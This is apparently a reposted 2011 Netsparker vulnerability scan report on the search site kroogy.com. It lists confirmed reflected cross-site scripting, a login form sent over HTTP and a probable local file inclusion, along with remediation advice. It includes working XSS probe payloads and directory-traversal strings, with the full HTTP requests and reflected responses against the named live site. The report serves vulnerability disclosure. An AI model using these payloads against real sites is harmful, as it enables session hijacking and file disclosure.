XSS, Cross Site Scripting in kroogy.com, CWE-79, CAPEC-86, DORK, GHDB REPORT SUMMARY
Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.
XSS.CX Home |
XSS.CX Research Blog
Loading
Netsparker - Scan Report Summary
TARGET URL
http://kroogy.com/
SCAN DATE
4/24/2011 7:34:39 AM
REPORT DATE
4/24/2011 10:38:51 AM
SCAN DURATION
01:33:46
Total Requests
14051
Average Speed
2.50
req/sec.
19
identified
9
confirmed
0
critical
6
informational
GHDB, DORK Tests
GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled
VULNERABILITIES
Vulnerabilities
VULNERABILITY SUMMARY
Vulnerability Summary
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript ) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
Parameters
Parameter
Type
Value
page
GET
><iMg src=N onerror=alert(9)>
type
GET
3
Request
GET /index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3 HTTP/1.1 Referer: http://kroogy.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:54:41 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 782 Connection: close Content-Type: text/html <html> <head><meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0"> <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: #FFF; } .top, .bottom {display:block; background:transparent; font-size:1px;} .tb1, .tb2, .tb3, .tb4 {display:block; overflow:hidden;} .tb1, .tb2, .tb3 {height:1px;} .tb2, .tb3, .tb4 {background:#dce7fd; border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .tb1 {margin:0 4px; background:#0099FF;} .tb2 {margin:0 3px; border-width:0 2px;} .tb3 {margin:0 2px; border-width:0 1px;} .tb4 {height:2px; margin:0 1px;} .bb1, .bb2, .bb3, .bb4 {display:block; overflow:hidden;} .bb1, .bb2, .bb3 {height:1px;} .bb2, .bb3, .bb4 { background:#dce7fd;border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .bb1 {margin:0 4px; background:#0099FF; border-width:0 1px;} .bb2 {margin:0 3px; border-width:0 2px;} .bb3 {margin:0 2px; border-width:0 1px;} .bb4 {height:2px; margin:0 1px;} .parenttable { background:#dce7fd; border-style:solid; border-color: blue; border-width:0 1px; padding: 5px;margin:0 0px;} --> </style> </head> <body> <center> <table> <tr> <td> <div class="nesoternd" > <b class="top"> <b class="tb1"></b> <b class="tb2"></b> <b class="tb3"></b> <b class="tb4"></b> </b> <table border="0" class="parenttable" width="100%"> <tr height="50"> <td valign="middle"><br><img src="images/err.gif"></td> <td valign="middle"><br><strong>Error: </strong>Requested page was not found!<br><strong>Details: </strong>Class <strong>><iMg src=N onerror=netsparker(9)>Controller</strong> not found!</td> </tr> <tr> <td colspan="2" align="center" align="left"><a href="index.php"><strong>Home</strong></a></td> </tr> </table> <b class="bottom"> <b class="bb4" ></b> <b class="bb3" ></b> <b class="bb2" ></b> <b class="bb1" ></b> </b> </div> </td> </tr> </table> </center> </body></html>
Parameters
Parameter
Type
Value
page
GET
><iMg src=N onerror=alert(9)>
type
GET
3
Request
GET /index/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3 HTTP/1.1 Referer: http://kroogy.com/index/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: region=%2A%2Fnetsparker%280x0003A5%29%3B%2F%2A; language=%2A%2Fnetsparker%280x000396%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:53:00 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 782 Connection: close Content-Type: text/html <html> <head><meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0"> <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: #FFF; } .top, .bottom {display:block; background:transparent; font-size:1px;} .tb1, .tb2, .tb3, .tb4 {display:block; overflow:hidden;} .tb1, .tb2, .tb3 {height:1px;} .tb2, .tb3, .tb4 {background:#dce7fd; border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .tb1 {margin:0 4px; background:#0099FF;} .tb2 {margin:0 3px; border-width:0 2px;} .tb3 {margin:0 2px; border-width:0 1px;} .tb4 {height:2px; margin:0 1px;} .bb1, .bb2, .bb3, .bb4 {display:block; overflow:hidden;} .bb1, .bb2, .bb3 {height:1px;} .bb2, .bb3, .bb4 { background:#dce7fd;border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .bb1 {margin:0 4px; background:#0099FF; border-width:0 1px;} .bb2 {margin:0 3px; border-width:0 2px;} .bb3 {margin:0 2px; border-width:0 1px;} .bb4 {height:2px; margin:0 1px;} .parenttable { background:#dce7fd; border-style:solid; border-color: blue; border-width:0 1px; padding: 5px;margin:0 0px;} --> </style> </head> <body> <center> <table> <tr> <td> <div class="nesoternd" > <b class="top"> <b class="tb1"></b> <b class="tb2"></b> <b class="tb3"></b> <b class="tb4"></b> </b> <table border="0" class="parenttable" width="100%"> <tr height="50"> <td valign="middle"><br><img src="images/err.gif"></td> <td valign="middle"><br><strong>Error: </strong>Requested page was not found!<br><strong>Details: </strong>Class <strong>><iMg src=N onerror=netsparker(9)>Controller</strong> not found!</td> </tr> <tr> <td colspan="2" align="center" align="left"><a href="index.php"><strong>Home</strong></a></td> </tr> </table> <b class="bottom"> <b class="bb4" ></b> <b class="bb3" ></b> <b class="bb2" ></b> <b class="bb1" ></b> </b> </div> </td> </tr> </table> </center> </body></html>
Parameters
Parameter
Type
Value
page
GET
><iMg src=N onerror=alert(9)>
type
GET
3
Request
GET /search/web/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3 HTTP/1.1 Referer: http://kroogy.com/search/web/LS%20magazine User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: language=8; region=BE-nl; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:08:43 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 782 Connection: close Content-Type: text/html <html> <head><meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0"> <style> <!-- .nesoternd { padding: 0px;margin:0 0px; background-color: #FFF; } .top, .bottom {display:block; background:transparent; font-size:1px;} .tb1, .tb2, .tb3, .tb4 {display:block; overflow:hidden;} .tb1, .tb2, .tb3 {height:1px;} .tb2, .tb3, .tb4 {background:#dce7fd; border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .tb1 {margin:0 4px; background:#0099FF;} .tb2 {margin:0 3px; border-width:0 2px;} .tb3 {margin:0 2px; border-width:0 1px;} .tb4 {height:2px; margin:0 1px;} .bb1, .bb2, .bb3, .bb4 {display:block; overflow:hidden;} .bb1, .bb2, .bb3 {height:1px;} .bb2, .bb3, .bb4 { background:#dce7fd;border-left:1px solid #0099FF; border-right:1px solid #0099FF;} .bb1 {margin:0 4px; background:#0099FF; border-width:0 1px;} .bb2 {margin:0 3px; border-width:0 2px;} .bb3 {margin:0 2px; border-width:0 1px;} .bb4 {height:2px; margin:0 1px;} .parenttable { background:#dce7fd; border-style:solid; border-color: blue; border-width:0 1px; padding: 5px;margin:0 0px;} --> </style> </head> <body> <center> <table> <tr> <td> <div class="nesoternd" > <b class="top"> <b class="tb1"></b> <b class="tb2"></b> <b class="tb3"></b> <b class="tb4"></b> </b> <table border="0" class="parenttable" width="100%"> <tr height="50"> <td valign="middle"><br><img src="images/err.gif"></td> <td valign="middle"><br><strong>Error: </strong>Requested page was not found!<br><strong>Details: </strong>Class <strong>><iMg src=N onerror=netsparker(9)>Controller</strong> not found!</td> </tr> <tr> <td colspan="2" align="center" align="left"><a href="index.php"><strong>Home</strong></a></td> </tr> </table> <b class="bottom"> <b class="bb4" ></b> <b class="bb3" ></b> <b class="bb2" ></b> <b class="bb1" ></b> </b> </div> </td> </tr> </table> </center> </body></html>
Password Transmitted Over HTTP
Password Transmitted Over HTTP
Netsparker identified that password data is sent over HTTP.
Impact
If an attacker can intercept network traffic he/she can steal users credentials.
Actions to Take
See the remedy for solution.
Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
mshtml.HTMLInputElementClass
Request
GET /pub/ HTTP/1.1 Referer: http://kroogy.com/pub/banner_728_90_random.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8; region=BE-nl Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:35:26 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Set-Cookie: PHPSESSID=totjukp6oqa5l5opadu8gndj05; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: Content-Length: 440 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Start Page</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><link rel="stylesheet" type="text/css" href="Colorful.css" /></head><body><h3 align="center">Please select a table to work with</h3> <table align="center" cellpadding="2" cellspacing="2"> <form action="login.php" method="post"> <tr><td>Username </td><td><input type="text" name="USERNAME"></td></tr> <tr><td>Password </td><td><input type="password" name="PASSWORD"></td></tr> <tr><td> </td><td><input type="submit" name="ACTION" value="Login"</td></tr> </form> </table>
[Probable] Local File Inclusion
[Probable] Local File Inclusion
A Local File Inclusion (LFI) vulnerability occurs when a file from the target system is injected into attacked server page. Even though Netsparker believes that there is a Local File Inclusion in here it
could not confirm it.
Impact
Impact can differ based on the exploitation and the read permission of the web server user. Depending on these factors an attacker might carry out one or more of the following attacks:
Gather usernames via /etc/password
file
Harvest useful information from the log files such as /apache/logs/error.log
or /apache/logs/access.log
Remotely execute commands via combining this vulnerability with some of other attack vectors such as file upload vulnerability or log injection.
If it's possible, do not accept appending file paths directly. Make it hard-coded or selectable from a limited hard-coded path list via an index variable
If you definitely need dynamic path concatenation, ensure that you only accept required characters such as "a-Z0-9" and do not allow "..", "/", "%00" (null byte) or any other similar unexpected characters.
Finally it's important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure that any potential attack can not perform a directory traversal attack.
Parameters
Parameter
Type
Value
search
GET
3"../../../../../../../../../../boot.ini " site:3 NOT site:3 NOT 3
type
GET
web
Request
GET /search/web?search=3%22../../../../../../../../../../boot.ini%00%22%20site:3%20NOT%20site:3%20NOT%203&type=web HTTP/1.1 Referer: http://kroogy.com/index/processadvancesearch User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:19:27 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 8812 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - 3"../../../../../../../../../../boot.ini " site:3 NOT site:3 NOT 3</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - 3"../../../../../../../../../../boot.ini " site:3 NOT site:3 NOT 3"><meta name="keywords" content="Kroogy Search,search,search engine,3"../../../../../../../../../../boot.ini " site:3 NOT site:3 NOT 3,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > பெருவிரல்சுவடை காமி <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft"> </td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright"> </td> <td class="inactivetableft"> </td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright"> </td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft"> </td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="3"../../../../../../../../../../boot.ini " site:3 NOT site:3 NOT 3" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td> </td><td> </td></tr></table></td><td class="searchtdright"> </td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">4,460,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearch..
Parameters
Parameter
Type
Value
search
GET
../../../../../../../../../../boot.ini
type
GET
web
startpage
GET
2
Request
GET /search/web?search=../../../../../../../../../../boot.ini&type=web&startpage=2 HTTP/1.1 Referer: http://kroogy.com/search/web/LS%20magazine User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: kroogy.com Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:15:01 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6,PleskLin Vary: Accept-Encoding Content-Encoding: Content-Length: 8698 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - ../../../../../../../../../../boot.ini</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - ../../../../../../../../../../boot.ini"><meta name="keywords" content="Kroogy Search,search,search engine,../../../../../../../../../../boot.ini,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > பெருவிரல்சுவடை காமி <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 